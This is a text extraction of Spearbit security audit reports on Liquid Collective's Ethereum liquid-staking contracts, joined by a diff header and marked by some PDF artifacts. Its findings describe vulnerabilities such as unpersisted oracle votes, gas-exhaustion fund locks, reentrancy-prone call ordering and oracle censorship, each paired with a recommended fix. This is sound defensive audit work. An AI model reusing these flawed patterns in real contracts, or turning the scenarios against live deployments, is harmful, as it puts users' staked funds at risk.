behavior between River _pullELFees and _pullCoverageFunds Severity: Informational Context: • River.1.sol#L254-L265 • River.1.sol#L270-L283 Description: Both _pullELFees and _pullCoverageFunds implement the same functionality: • Pull funds from a contract address. • Update the balance storage variable. • Emit an event. • Return the amount of balance collected from the contract. The _pullCoverageFunds differs from the _pullELFees implementation by avoiding both updating the Balance- ToDeposit when collectedCoverageFunds == 0 and emitting the PulledCoverageFunds event. Because they are implementing the same functionality, they should follow the same behavior if there is not an explicit reason to not do so. 31 Recommendation: Consider applying the same behavior to both _pullELFees and _pullCoverageFunds or ex- plain which is the reason why those should be different. Consider emitting the PulledCoverageFunds event even in case collectedCoverageFunds == 0 if you think that it should be an event to be monitored even in case no funds were pulled from the contract. Spearbit: With PR 168 Alluvial has changed _pullELFees to follow the same behavior of _pullCoverageFunds. With the new implementation, both functions do not update the unstructured storage variable value and fire the event if the collected funds are equal to zero. Alluvial has acknowledged that with the current implementation, they are not emitting and monitoring those cases where the OracleManager requests non-zero funds to be pulled but in EL Fees or Coverage Funds are no funds to be pulled. +7.5.22 Move local mask variable from Allowlist.1.sol to LibAllowlistMasks.sol Severity: Informational Context: Allowlist.1.sol#L21, LibAllowlistMasks.sol Description: LibAllowlistMasks.sol is meant to contain all mask values, but DENY_MASK is a local variable in the Allowlist.1.sol contract. Recommendation: Move DENY_MASK variable to LibAllowMasks.sol and make necessary changes to Allowlist.1.sol. Alluvial: Very good point and clearly a miss from our end. Fixed in PR 166. Spearbit: Fixed. +7.5.23 Consider adding additional parameters to the existing events to improve filtering/monitoring Severity: Informational Context: • IVestingScheduleManager.1.sol#L15 • IVestingScheduleManager.1.sol#L20 • IVestingScheduleManager.1.sol#L25 • IVestingScheduleManager.1.sol#L31 Description: Some already defined events could be improved by adding more parameters to better track those events in dApps or monitoring tools. • Consider adding address indexed delegatee as an event's parameter to event CreatedVestingSchedule. While it's true that after the vest/lock period the beneficiary will be the owner of those tokens, in the meanwhile (if _delegatee != address(0)) the voting power of all those vested tokens are delegated to the _delegatee. • Consider adding address indexed beneficiary to event ReleasedVestingSchedule. • Consider adding uint256 newEnd to event RevokedVestingSchedule to track the updated end of the vesting schedule. • Consider adding address indexed beneficiary to event DelegatedVestingEscrow. If those events parameters are added to the events, the Alluvial team should also remember to update the relative natspec documentation. Recommendation: Consider adding the suggested parameters to the relative events and updated the natspec documentation where needed. Spearbit: In PR 172, Alluvial has implemented part of the recommendations: 32 • Added additional parameter uint256 newEnd to the event RevokedVestingSchedule. • Added additional parameter address indexed beneficiary to the event DelegatedVestingEscrow. +7.5.24 Missing indexed keyword in events parameters Severity: Informational Context: • IRiver.1.sol#L27 • IVestingScheduleManager.1.sol#L31 • ICoverageFund.1.sol#L15 Description: Some events parameters are missing the indexed keyword. Indexing specific parameters is partic- ularly important to later be able to filter those events both in dApps or monitoring tools. • coverageFund event parameter should be declared as indexed in event SetCoverageFund. • Both oldDelegatee and newDelegatee should be indexed in event DelegatedVestingEscrow. • donator should be declared as indexed in event Donate. Recommendation: Declare the specified event parameters as indexed where needed. Alluvial: Recommendation has been implemented in PR 168 and PR 172. Spearbit: Fixed. +7.5.25 Add natspec documentation to the TLC contract Severity: Informational Context: TLC.1.sol Description: The current implementation of TLC contract is missing natspec at the root level to explain the contract. The natspec should cover the basic explanation of the contract (like it has already been done in other contracts like River.sol) but also illustrate • TLC token has a fixed max supply that is minted at deploy time. • All the minted tokens are sent to a single account at deploy time. • How TLC token will be distributed. • How voting power works (you have to delegate to yourself to gain voting power). • How the vesting process works. • Other general information useful for the user/investor that receives the TLC token directly or vested. Recommendation: Add natspec documentation to the TLC contract to explain what the contract does and how TLC tokens are minted, distributed, and used. Alluvial: Recommendation has been implemented in PR 172. Spearbit: Fixed. 33 diff --git a/findings_newupdate/spearbit/LiquidCollective3-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/LiquidCollective3-Spearbit-Security-Review.txt new file mode 100644 index 0000000..2b71f73 --- /dev/null +++ b/findings_newupdate/spearbit/LiquidCollective3-Spearbit-Security-Review.txt @@ -0,0 +1,49 @@ +6.1.1 _pickNextValidatorsToExitFromActiveOperators uses the wrong index to query stopped validator count for operators Severity: Critical Risk Context: OperatorsRegistry.1.sol#L628 In _pickNextValidatorsToExitFromActiveOperators, OperatorsV2.CachedOperator[] memory Description: operators does not necessarily have the same order as the actual OperatorsV2's operators, since the ones that don't have _hasExitableKeys will be skipped (the operator might not be active or all of its funded keys might have been requested to exit). And so when querying the stopped validator counts for (uint256 idx = 0; idx < exitableOperatorCount;) { uint32 currentRequestedExits = operators[idx].requestedExits; uint32 currentStoppedCount = _getStoppedValidatorsCountFromRawArray(stoppedValidators, idx); one should not use the idx in the cached operator's array, but the cached index of this array element, as the indexes of stoppedValidators correspond to the actual stored operator's array in storage. Note that when emitting the UpdatedRequestedValidatorExitsUponStopped event, the correct index has been used. Recommendation: operators[idx].index The calculation for currentStoppedCount needs to be corrected to use uint32 currentStoppedCount = _getStoppedValidatorsCountFromRawArray(stoppedValidators, ,! operators[idx].index); Also, since this was not caught by test cases, it would be best to add some passing and failing test cases for _pickNextValidatorsToExitFromActiveOperators. Liquid Collective: Fixed in commit a109a1. Spearbit: Verified. +6.1.2 Oracles' reports votes are not stored in storage Severity: Critical Risk Context: Oracle.1.sol#L268 Description: The purpose of Oracle.1.sol is to facilitate the reporting and quorum of oracles. Oracles period- ically add their reports and when consensus is reached the setConsensusLayerData function (which is a critical component of the system) is called. However, there is an issue with the current implementation as ReportVari- ants holds the reports made by oracles but ReportVariants.get() returns a memory array instead of a storage array, therefore resulting in an increase in votes that will not be stored at the end of the transaction and prevent- ing setConsensusLayerData from being called. This is a regression bug that should have been detected by a comprehensive test suite. Recommendation: Short term, modify ReportVariants.get() so that it returns a storage array instead of a memory array. By returning a storage array we can ensure that any increase in votes will be persisted to the blockchain and that setConsensusLayerData will be called when a quorum is reached. Long term, make sure to have a comprehensive test suite with high code coverage that is incorporated as part of the CI/CD process. Liquid Collective: Fixed in commit f73551 by following the auditor's recommendation. Spearbit: Verified. 8 6.2 High Risk +6.2.1 User's LsETH might be locked due to out-of-gas error during recursive calls Severity: High Risk Context: RedeemManager.1.sol#L417 Description: Let W0, W1, ...W7 represent the withdrawal events in the withdrawal stack. Let R0, R1, R2 represent the users' redeem requests in the redeem queue. Assume that Alice is the owner of R1. When Alice called the resolveRedeemRequests function against R1, it will resolve to W 1. Next, Alice called the _claimRedeemRequest function with R1 and its corresponding W 1. The _claimRedeemRequest will first process W 1. At the end of the function, it will check if W 1 matches all the amounts of R1. If not, it will call the _claimRedeemRequest function recursively with the same request id (R1) but increment the withdrawal event id (W2 = W1 + 1). The _claimRedeemRequest function recursively calls itself until all the amount of redeem request is "expended" or the next withdrawal event does not exist. In the above example, the _claimRedeemRequest will be called 7 times with W1...W7, until all the amount of R1 is "expended" (R1.amount == 0) However, if the amount of a redeem request is large (e.g. 1000 LsETH), and this redeem request is satisfied by many small chunks of withdrawal events (e.g. one withdrawal event consists of less than 10 LsETH), then the recursion depth will be large. The function will keep calling itself recursively until an out-of-gas error happens. If this happens, there is no way to claim the redemption request, and the user's LsETH will be locked. In the current implementation, users cannot break the claim into smaller chunks to overcome the gas limit. In the above example, if Alice attempts to break the claim into smaller chunks by first calling the _claimRedeemRequest function with R1 and its corresponding W5, the _isMatch function within it will revert. Recommendation: Consider allowing the users to break the claim into smaller chunks to overcome the gas limit. Liquid Collective: Fixed in commit e8ca5d. Spearbit: Verified. 6.3 Medium Risk +6.3.1 Allowed users can directly transfer their share to RedeemManager Severity: Medium Risk Context: RedeemManager.1.sol#L280-L281, SharesManager.1.sol#L105 , SharesManager.1.sol#L119 Description: An allowed user can directly transfer its shares to the RedeemManager without requesting a redeem. This would cause the withdrawal stack to grow, since the redeem demand (2) which is calculated based on the RedeemManager's share of LsETH increases. RedeemQueue would be untouched in this case. In case of an accidental mistake by a user, the locked shares can only be retrieved by a protocol update. Recommendation: Make sure ShareManager would not allow users to directly transfer their shares to the Redeem- Manager unless the call to transferFrom is made by the RedeemManager. Liquid Collective: Fixed. Spearbit: This issue has been addressed by introducing a storage variable RedeemDemand that would keep track of redeem demand for the redeem manager contract: • commit dda655 • commit bc3afe It does not address the issue that shares can be directly transferred to the redeem manager by a user. 9 +6.3.2 Invariants are not enforced for stopped validator counts Severity: Medium Risk Context: OperatorsRegistry.1.sol#L419-L440 Description: _setStoppedValidatorCounts does not enforce the following invariants: • stoppedValidatorCounts[0] <= DepositedValidatorCount.get() • stoppedValidatorCounts[i] needs to be a non-decreasing function when viewed on a timeline • stoppedValidatorCounts[i] needs to be less than or equal to the funded number of validators for the corresponding operator. Currently, the oracle members can report values that would break these invariants. As a consequence, the oracle members can signal the operators to exit more or fewer validators by manipulating the preExitingBalance value. And activeCount for exiting validators picking algorithm can also be manipulated per operator. Recommendation: Make sure the invariants mentioned above are enforced on-chain before oracle reports get used and/or stored. Liquid Collective: Fixed in PR 195. Spearbit: Verified. +6.3.3 Potential out of gas exceptions Severity: Medium Risk Context: OracleManager.1.sol#L432, OperatorsRegistry.1.sol#L529 Description: The purpose of _requestExitsBasedOnRedeemDemandAfterRebalancings is to release liquidity for withdrawals made in the RedeemManager contract. The function prioritizes liquidity sources, starting with Balance- ToRedeem and then BalanceToDeposit, before asking validators to exit. However, if the validators are needed to release more liquidity, the function uses pickNextValidatorsToExit to determine which validators to ask to exit. This process can be quite gas-intensive, especially if the number of validators is large. The gas consumption of this function depends on several factors, including exitableOperatorCount, stoppedVal- idators.length, and the rate of decrease of _count. These factors may increase over time, and the msg.sender does not have control over them. The function includes two nested loops that contribute to the overall gas con- sumption, and this can be problematic for certain inputs. For example, if the operators array has no duplications and the difference between values is exactly 1, such as [n, n-1, n-2 ... n-k] where n can be any number and k is a large number equals exitableOperatorCount - 1 and _count is also large, the function can become extremely gas-intensive. The main consequence of such a potential issue is that the function may not release enough liquidity to the RedeemManager contract, resulting in partial fulfillment of redemption requests. Similarly, _pickNextValidatorsToDepositFromActiveOperators is also very gas intensive. If the number of de- sired validators and current operators (including fundable operators) are high enough, depositToConsensusLayer is no longer callable. Recommendation: To address the potential gas consumption issue with _requestExitsBasedOnRedeemDe- mandAfterRebalancings, the following steps can be considered 1. Allow _requestExitsBasedOnRedeemDemandAfterRebalancings to be called independently and not just as part of setConsensusLayerData. 2. Currently, the _count parameter is dependent on several variables that cannot be determined by the caller, including redeemManagerDemandInEth, availableBalanceToRedeem, exitingBalance, and preExitingBal- ance. To improve efficiency, it would be better to allow the caller to specify a value for _count and use the minimum value between the caller's input and validatorCountToExit to determine the number of validators to exit. 10 3. It's important to run tests to measure and monitor the worst-case scenario, particularly around the while (_- count > 0) { section. If necessary, consider replacing the decision algorithm with a more efficient approach to reduce gas consumption. For _pickNextValidatorsToDepositFromActiveOperators: 1. Similar to the previous suggestion, allow it to run independently from depositToConsensusLayer. 2. Consider using a min heap to select operators with the lowest active validator count. Liquid Collective: The process for picking validators to exit upon report quorum is broken into 2 or more transac- tions now by introducing the following functions: • demandValidatorExits • requestValidatorExits in PR 195. Recommendations not applied for _pickNextValidatorsToDepositFromActiveOperators. Spearbit: Verified. 6.4 Low Risk +6.4.1 The validator count to exit in _requestExitsBasedOnRedeemDemandAfterRebalancings assumes that the to-be selected validators are still active and have not been penalised. Severity: Low Risk Context: River.1.sol#L568-L571 Description: The validatorCountToExit is calculated as follows uint256 validatorCountToExit = LibUint256.ceil( redeemManagerDemandInEth - (availableBalanceToRedeem + exitingBalance + preExitingBalance), DEPOSIT_SIZE ); This formula assumes that the to-be selected validators exit by the pickNextValidatorsToExit are: 1. Still active 2. Have not been queued to be exited and 3. Have not been penalized and their balance is at least MAX_EFFECTIVE_BALANCE Recommendation: Just like stopped validator count, the oracles could report back more granular data including consensus layer balances per validator to make sure the exit strategy for the validators roughly guarantees the current redeem demand. This would still not be perfect, since there will always be a lag/delay between the reported data by oracles for a past epoch and the current balances on the validators. Liquid Collective: This would be pretty hard to implement, we're ok to not have this accuracy and have a protocol able to respond in an async manner to possible deltas between demand and actual volume. Here requesting a 32 ETH exit, if only ~20 are entering the exiting balance buffer, we are going to request another exit on the next report. Spearbit: Acknowledged. 11 +6.4.2 Burn RedeemManager's share first before calling its reportWithdraw endpoint Severity: Low Risk Context: River.1.sol#L509-L518 Description: reportWithdraw and then burns the corresponding shares for the RedeemManager The current implementation of _reportWithdrawToRedeemManager calls RedeemManager's // perform a report withdraw call to the redeem manager redeemManager_.reportWithdraw{value: suppliedRedeemManagerDemandInEth}(suppliedRedeemManagerDemand); // we burn the shares of the redeem manager associated with the amount of eth provided _burnRawShares(address(RedeemManagerAddress.get()), suppliedRedeemManagerDemand); Recommendation: To avoid potential future reentrancy from RedeemManager it would be best to burn the shares first and then call the reportWithdraw endpoint // we burn the shares of the redeem manager associated with the amount of eth provided _burnRawShares(address(RedeemManagerAddress.get()), suppliedRedeemManagerDemand); // perform a report withdraw call to the redeem manager redeemManager_.reportWithdraw{value: suppliedRedeemManagerDemandInEth}(suppliedRedeemManagerDemand); Liquid Collective: Fixed in commit e47cb8. Spearbit: Verified. +6.4.3 OracleManager allows reporting for the same epoch multiple times, leading to unknown behavior. Severity: Low Risk Context: OracleManager.1.sol#L463 Description: Currently, it is possible for the oracle to report on the same epoch multiple times, because _- isValidEpoch checks that the report's epoch >= LastConsensusLayerReport.get().epoch. This can lead the contract to unspecified behavior • The code will revert if the report increases the balance, not with an explicit check but reverting due to a subtraction underflow, since maxIncrease == 0 and • Allowing other code paths to execute to completion. Recommendation: Explicitly disallow this execution path by using a strictly increasing criterion - epoch >= LastConsensusLayerReport.get() + epoch > LastConsensusLayerReport.get() Liquid Collective: Fixed in PR 193. Spearbit: Verified. 12 +6.4.4 Missing event emit when user calls deposit Severity: Low Risk Context: UserDepositManager.1.sol#L50, River.1.sol#L435 Description: Whenever BalanceToDeposit is updated, the protocol should emit a SetBalanceToDeposit, but when a user calls UserDepositManager.deposit, the event is never emitted which could break tooling. Recommendation: Instead of setting the value of the variable directly, call River._setBalanceToDeposit function since it emits the event /// @notice Sets the balance to deposit, but not yet committed /// @param newBalanceToDeposit The new balance to deposit value function _setBalanceToDeposit(uint256 newBalanceToDeposit) internal override(UserDepositManagerV1) { emit SetBalanceToDeposit(BalanceToDeposit.get(), newBalanceToDeposit); BalanceToDeposit.set(newBalanceToDeposit); } Liquid Collective: Fixed in PR 196. Spearbit: Verified. +6.4.5 Reset the report data and increment the last epoch id before calling River's setConsensusLayerData when a quorum is made Severity: Low Risk Context: Oracle.1.sol#L254-L263 Description: The current implementation of reportConsensusLayerData calls river.setConsensusLayerData(report) first when a quorum is made then resets the report variant and position data and also it increment the last epoch id afterward // if adding this vote reaches quorum if (variantVotes + 1 >= quorum) { // we push the report to river river.setConsensusLayerData(report); // we clear the reporting data _clearReports(); // we increment the lastReportedEpoch to force reports to be on the last frame LastEpochId.set(lastReportedEpochValue + 1); emit SetLastReportedEpoch(lastReportedEpochValue + 1); } In the future version of the protocol there might be a possibility for an oracle member to call back into reportCon- sensusLayerData when river.setConsensusLayerData(report) is called and so it would open a reentrancy for compromised/malicious oracle members. Recommendation: It would be best to clear the reporting data and increment the last epoch id first then call into the River contract // if adding this vote reaches quorum if (variantVotes + 1 >= quorum) { // we clear the reporting data _clearReports(); // we increment the lastReportedEpoch to force reports to be on the last frame LastEpochId.set(lastReportedEpochValue + 1); // we push the report to river river.setConsensusLayerData(report); emit SetLastReportedEpoch(lastReportedEpochValue + 1); } ... 13 Liquid Collective: Fixed in commit 4ab66c. Spearbit: Verified. +6.4.6 Update BufferedExceedingEth before calling sendRedeemManagerExceedingFunds Severity: Low Risk Context: RedeemManager.1.sol#L157-L158 Description: In pullExceedingEth , River's sendRedeemManagerExceedingFunds is called before updating the RedeemManager's BufferedExceedingEth storage value _river().sendRedeemManagerExceedingFunds{value: amountToSend}(); BufferedExceedingEth.set(BufferedExceedingEth.get() - amountToSend); Recommendation: It would be best to update it before calling River to avoid future bookkeeping mistakes through unwanted reentrancy BufferedExceedingEth.set(BufferedExceedingEth.get() - amountToSend); _river().sendRedeemManagerExceedingFunds{value: amountToSend}(); pullCoverageFunds follow this suggestion and also only updates and send funds if amountToSend is non-zero. Liquid Collective: Fixed in commit b92b87. Spearbit: Verified. +6.4.7 Any oracle member can censor almost quorum report variants by resetting its address Severity: Low Risk Context: Oracle.1.sol#L189-L201 Description: The admin or an oracle member can DoS or censor almost quorum reports by calling setMember endpoint which would reset the report variants and report positions. The admin also can reset the/clear the reports by calling other endpoints by that should be less of an issue compared to just an oracle member doing that. Recommendation: The protocol could • Rate limit this endpoint or • Make the endpoint only callable by a more privileged account • Disallow resetting an oracle member address close to the next upcoming frame epoch. If no action is taken to address this issue, this scenario should be documented and monitored. Liquid Collective: In commit aadbfb report data is not cleared anymore when setMember is called. Spearbit: Verified. 14 +6.4.8 Incentive mechanism that encourages operators to respond quickly to exit requests might diminish under certain condition Severity: Low Risk Context: Operators.2.sol#L158 Description: /// @notice Retrieve all the active and fundable operators /// @dev This method will return a memory array of length equal to the number of operator, but /// @dev populated up to the fundable operator count, also returned by the method /// @return The list of active and fundable operators /// @return The count of active and fundable operators function getAllFundable() internal view returns (CachedOperator[] memory, uint256) { // uint32[] storage stoppedValidatorCounts = getStoppedValidators(); for (uint256 idx = 0; idx < operatorCount;) { _hasFundableKeys(r.value[idx]) && _getStoppedValidatorCountAtIndex(stoppedValidatorCounts, idx) >= r.value[idx].requestedExits only @audit-ok File: Operators.2.sol 153: 154: ,! 155: 156: 157: 158: ,! ..SNIP.. 172: 173: 174: 175: 176: 177: ,! 178: if ( ) { r.value[idx].requestedExits is the accumulative number of requested validator exits by the protocol _getStoppedValidatorCountAtIndex(stoppedValidatorCounts, idx) function is a value reported by oracle members which consist of both exited and slashed validator counts It was understood the rationale of having the _getStoppedValidatorCountAtIndex(stoppedValidatorCounts, idx) >= r.value[idx].requestedExits conditional check at Line 177 above is to incentivize operators to re- In other words, an operator with a re- spond quickly to exit requests if they want new stakes from deposits. questedExits value larger than the _getStoppedValidatorCountAtIndex count indicates that an operator did not submit exit requests to the Consensus Layer (CL) in a timely manner or the exit requests have not been finalized in CL. However, it was observed that the incentive mechanism might not work as expected in some instances. Consider the following scenario: Assuming an operator called A has 5 slashed validators and 0 exited validators, the _getStoppedValidator- CountAtIndex function will return 5 for A since this function takes into consideration both stopped and slashed validators. Also, assume that the requestedExits of A is 5, which means that A has been instructed by the protocol to submit 5 exit requests to CL. In this case, the incentive mechanism seems to diminish as A will still be considered a fundable operator even if A does not respond to exit requests since the number of slashed validators is enough to "help" to push up the stopped validator count to satisfy the condition, giving the wrong impression that A has already submitted the exit requests. As such, A will continue to be selected to stake new deposits. Recommendation: Consider excluding the number of slashed validators from the total number of stopped valida- tor counts when performing the conditional check at Line 177 of the Operator.getAllFundable function so that one can more accurately determine the number of exit requests that the operators have responded. Liquid Collective: Separating exits from slashes would add a lot of complexity to the reporting process. Here we have a mechanism to catch up between stopped and requested exits so they should be accounted for in the exiting process as well in case of involuntary slash or exit when nothing was asked. Spearbit: Acknowledged. 15 +6.4.9 RedeemManager. _claimRedeemRequests transaction sender might be tricked to pay more eth in trans- action fees Severity: Low Risk Context: RedeemManager.1.sol#L451 Description: The _claimRedeemRequests function is designed to allow anyone to claim ETH on behalf of another party who has a valid redeem request. The function iterates through the redeemRequestIds list and fulfills each request individually. However, it is important to note that the transfer of ETH to the recipients is only limited by the 63/64 rule, which means that it is possible for a recipient to take advantage of a heavy fallback function and potentially cause the sender to pay a significant amount of unwanted transaction fees. Recommendation: To mitigate this issue, we recommend limiting the amount of gas forwarded to the call in _claimRedeemRequests. This can be achieved by explicitly specifying the gas amount for the .call function. Implementing these measures will also inherently prevent any potential reentrancy attack vectors, although none have been discovered thus far. Liquid Collective: This issue is acknowledged and it will be up to the integrator in charge of sponsoring the gas to ensure that the recipients are in a known set or are EOAs. Otherwise, users will always have the ability to claim redemption requests by themselves. Spearbit: Acknowledged. +6.4.10 Claimable LsETH on the Withdraw Stack could exceed total LsETH requested on the Redeem Queue Severity: Low Risk Context: RedeemManager.1.sol#L136 Description: Let the total amount of claimable LsETH on the Withdraw Stack be x and the total amount of LsETH requested on the Redeem Queue be y. The following points are extracted from the Withdrawals Smart Contract Architecture documentation: • The design ensures that x <= y . Refer to page 15 of the documentation. • It is impossible for a redeem request to be claimed before at least one Oracle report has occurred, so it is impossible to skip a slashing time penalty. Refer to page 16 of the documentation. Based on the above information, the main purpose of the design (x <= y) is to avoid favorable treatment of LsETH holders that would request a redemption before others following a slashing incident. However, this constraint (x <= y ) is not being enforced in the contract. The reporter could continue to report withdrawal via the RedeemManager.reportWithdraw function till the point x > y. If x > y, LsETH holders could request a redemption before others following a slashing incident to gain an advan- tage. Recommendation: Ensure that the constraint (x <= y) is enforced in the contract. Liquid Collective: Fixed in PR 197. Spearbit: Verified. 16 +6.4.11 An oracle member can resubmit data for the same epoch multiple times if the quorum is set to 1 Severity: Low Risk Context: Oracle.1.sol#L232-L237, Oracle.1.sol#L261 Description: If the quorum is set to 1 and the difference between the report's epoch e and LastEpochId.get() is (cid:1)e, an oracle member will be able to call reportConsensusLayerData (cid:1)e + 1 times to push its report for epoch e to the protocol and with different data each time (only restriction on successive reports is that the difference of underlying balance between reports would need to be negative since the maxIncrease will be 0). Note that in reportConsensusLayerData the first storage write to LastEpochId will be overwritten later due to quorum of one: x = LastEpochId -> report.epoch -> x + 1 Recommendation: When the quorum is reached update LastEpochId to be equal to report.epoch + 1 // if adding this vote reaches quorum if (variantVotes + 1 >= quorum) { // we push the report to river river.setConsensusLayerData(report); // we clear the reporting data _clearReports(); // --- changes below --- // we increment the LastEpochId to force the next reports to be on the next frame LastEpochId.set(report.epoch + 1); emit SetLastReportedEpoch(report.epoch + 1); } Liquid Collective: Fixed in commit 4ab66c. Spearbit: Verified. +6.4.12 Report's validatorsCount's historical non-decreseness does not get checked Severity: Low Risk Context: OracleManager.1.sol#L318-L321, IOracleManager.1.sol#L109, IOracleManager.1.sol#L122 Description: Once the Oracle members come to a quorum for a selected report variant, the validators count is stored in the storage. Note that validatorsCount is supposed to represent the total cumulative number of validators ever funded on consensus layer (even if they have been slashed or exited at some point ). So this value is supposed to be a non-decreasing function of reported epochs. But this invariant has never been checked in setConsensusLayerData. Recommendation: Make sure to add an if block to revert in case the reported validator count is smaller than the stored one from the previous report. Liquid Collective: Fixed in commit 8b058b. Spearbit: Verified. 17 +6.4.13 The report's slashingContainmentMode and bufferRebalancingMode are decided by the oracle mem- bers which affects the exiting strategy of validators Severity: Low Risk Context: OracleManager.1.sol#L429-L435, River.1.sol#L545-L554 Description: The current protocol leaves it up to the oracle members to come to a quorum to set either of the report.slashingContainmentMode or report.bufferRebalancingMode to true or false. That means the oracle members have the power to decide off-chain whether validators should be exited and whether some of the deposit balance should be reallocated for redeeming (vs an algorithmic decision by the protocol on-chain). A potential bad scenario would be oracle members deciding to not signal for new validators to exit and from the time for the current epoch to the next report some validators get penalized or slashed which would reduce the If those validators would have exited before getting slashed or penalized, the underlying value of the shares. redeemers would have received more ETH back for their investment. Recommendation: Document the off-chain decision making process for setting report.slashingContainmentMode and report.bufferRebalancingMode or implement a trustless process on-chain. Liquid Collective: This decision was made in parallel to releasing a public specification of the Oracle report crafting algorithm, allowing anyone to audit the reports based on the aggregated public data. The bufferRebalancingMode is still not 100% defined on our side but the value will be set based on the lengths of entry and exit queues, that we don't have on-chain. This is the intended behavior, we want the oracle to be precisely defined by a spec (wip on our side) so that anyone could audit and rebuild the reported data due to its ability to be replayed from public data. Spearbit: Acknowledged. +6.4.14 Anyone can call depositToConsensusLayer and potentially push wrong data on-chain Severity: Low Risk Context: ConsensusLayerDepositManager.1.sol#L81 Description: Anyone can call depositToConsensusLayer and potentially push wrong data on-chain. An example is when an operator would want to remove a validator key that is not-funded yet but has an index below the operator limit and will be picked by the strategy if depositToConsensusLayer is called. Then anyone can front run the removal call by the operator and force push this validator's info to the deposit contract. Recommendation: It would be best to restrict the calls to depositToConsensusLayer to a privileged entity. Liquid Collective: This is the downside of putting this method back to public. The main goal here is to limit the required actions from an admin entity to operate the system. Now everything required to run it in its current operator registry state is the oracle report. This is the accepted behavior, the main goal is to concentrate critical decisions around the Oracle, making it the main bottleneck, upon which we will work to further decentralize its quorum participation / verification logic. Spearbit: Acknowledged. 18 6.5 Gas Optimization +6.5.1 Calculation of currentMaxCommittableAmount can be simplified Severity: Gas Optimization Context: River.1.sol#L603-L607 Description: currentMaxCommittableAmount is calculated as: // we adapt the value for the reporting period by using the asset balance as upper bound uint256 underlyingAssetBalance = _assetBalance(); uint256 currentBalanceToDeposit = BalanceToDeposit.get(); ... uint256 currentMaxCommittableAmount = LibUint256.min( LibUint256.min(underlyingAssetBalance, (currentMaxDailyCommittableAmount * period) / 1 days), currentBalanceToDeposit ); But underlyingAssetBalance is Bu = Bv +Bd +Bc +Br +32(Cd (cid:0)Cr ) which is greater than currentBalanceToDeposit Bd since the other components are non-negative values. parameter description Bv Bd Bc Br Cd Cr M m Bu LastConsensusLayerReport.get().validatorsBalance BalanceToDeposit.get() CommittedBalance.get() BalanceToRedeem.get() DepositedValidatorCount.get() LastConsensusLayerReport.get().validatorsCount currentMaxCommittableAmount currentMaxDailyCommittableAmount * period) / 1 days underlyingAssetBalance Note that the fact that Cd (cid:21) Cr is an invariant that is enforced by the protocol. and so currently we are computing M as: M = min(Bu, Bd , m) = min(Bd , m) since Bu (cid:21) Bd . Recommendation: Based on the definitions and the invariant checks, the above minimum calculation can be simplified to: uint256 currentMaxCommittableAmount = LibUint256.min(currentMaxDailyCommittableAmount * period) / 1 ,! days, currentBalanceToDeposit); Liquid Collective: Fixed in commit 8f0f29. Spearbit: Verified. 19 +6.5.2 Remove redundant array length check and variable to save gas. Severity: Gas Optimization Context: ConsensusLayerDepositManager.1.sol#L103, ValidatorKeys.sol#L83-L84 Description: When someone calls ConsensusLayerDepositManager.depositToConsensusLayer, the contract will verify that the receivedSignatureCount matches the receivedPublicKeyCount returned from _getNextVal- idators. This is unnecessary as the code always creates them with the same length. Recommendation: Remove the check and associated variable to save some gas: - uint256 receivedSignatureCount = signatures.length; - if (receivedSignatureCount != receivedPublicKeyCount) { - - } revert InvalidSignatureCount(); Liquid Collective: Fixed in PR 196. Spearbit: Verified. +6.5.3 Duplicated events emitted in River and RedeemManager Severity: Gas Optimization Context: RedeemManager.1.sol#L159, River.1.sol#L481 Description: The amount of ETH pulled from the redeem contract when setConsensusData is called by the oracle is notified with events in both RedeemManager and River contracts. Recommendation: Consider removing SentExceedingEth from RedeemManager to save gas and using only PulledRedeemManagerExceedingEth from River. Liquid Collective: Fixed in commit ec310f. Spearbit: Fixed. +6.5.4 totalRequestedExitsValue's calculation can be simplified Severity: Gas Optimization Context: OperatorsRegistry.1.sol#L678-L692 Description: In the for loop in this context, totalRequestedExitsValue is updated for every operator that sat- isfies _getActiveValidatorCountForExitRequests(operators[idx]) == highestActiveCount. Based on the used increments, their sum equals to optimalTotalDispatchCount. Recommendation: One can increment totalRequestedExitsValue in one go outside of this for loop // for loop without `totalRequestedExitsValue` updates totalRequestedExitsValue += optimalTotalDispatchCount; // <--- new line _count -= optimalTotalDispatchCount; Liquid Collective: Fixed in commit 50af4e. Spearbit: Verified. 20 +6.5.5 Report's bufferRebalancingMode and slashingContainmentMode are only used during the reporting transaction process Severity: Gas Optimization Context: OracleManager.1.sol#L340-L341 Description: report.bufferRebalancingMode and report.slashingContainmentMode are only used during the transaction and their previous values are not used in the protocol. They can be removed from being added to the stored report. Note that their historical values can be queried by listening to the ProcessedConsensusLayerReport(report, vars.trace) events. Recommendation: The implementation can be changed so that bufferRebalancingMode and slashingContain- mentMode only occupy stack or storage space and do not get added to storage. Liquid Collective: The main reason was to be able to query the entire latest report from view calls. We will keep these in storage as currently the slashingContainmentMode flag is used in the oracle process (if active, the logics to deactivate are different so we need the last report value). Not the case for bufferRebalanc- ingMode but as the spec of the oracle might evolve it is better to keep both. Spearbit: Acknowledged. 6.6 Informational +6.6.1 Add more comments/documentation for ConsensusLayerReport and StoredConsensusLayerReport structs Severity: Informational Context: IOracleManager.1.sol#L102-L125 Description: The ConsensusLayerReport and StoredConsensusLayerReport structs are defined as /// @notice The format of the oracle report struct ConsensusLayerReport { uint256 epoch; uint256 validatorsBalance; uint256 validatorsSkimmedBalance; uint256 validatorsExitedBalance; uint256 validatorsExitingBalance; uint32 validatorsCount; uint32[] stoppedValidatorCountPerOperator; bool bufferRebalancingMode; bool slashingContainmentMode; } /// @notice The format of the oracle report in storage struct StoredConsensusLayerReport { uint256 epoch; uint256 validatorsBalance; uint256 validatorsSkimmedBalance; uint256 validatorsExitedBalance; uint256 validatorsExitingBalance; uint32 validatorsCount; bool bufferRebalancingMode; bool slashingContainmentMode; } Comments regarding their specified fields are lacking. Recommendation: Add more documentation, specifically it would be great to mention 21 • The requirements for a valid epoch that is reported or stored • The fact that the validatorsSkimmedBalance, validatorsExitedBalance, and validatorsCount are non- decreasing values • What bufferRebalancingMode and slashingContainmentMode flags are and how they get decided to be picked by the oracle members • Define exactly how and at what specific moment these values are calculated And then make sure the current and future implementations are following these specifications. Liquid Collective: Fixed in commit 07c57e. Spearbit: Verified. +6.6.2 postUnderlyingBalanceIncludingExits and preUnderlyingBalanceIncludingExits can be removed from setConsensusLayerData Severity: Informational Context: OracleManager.1.sol#L349, OracleManager.1.sol#L360, OracleManager.1.sol#L380 Description: Both postUnderlyingBalanceIncludingExits ( Bpost ) and preUnderlyingBalanceIncludingEx- its ( Bpre ) include the accumulated skimmed and exited amounts overtime which part of them might have exited the protocol through redeeming (or skimmed back to CL and penalized). Their delta is almost the same as the delta of 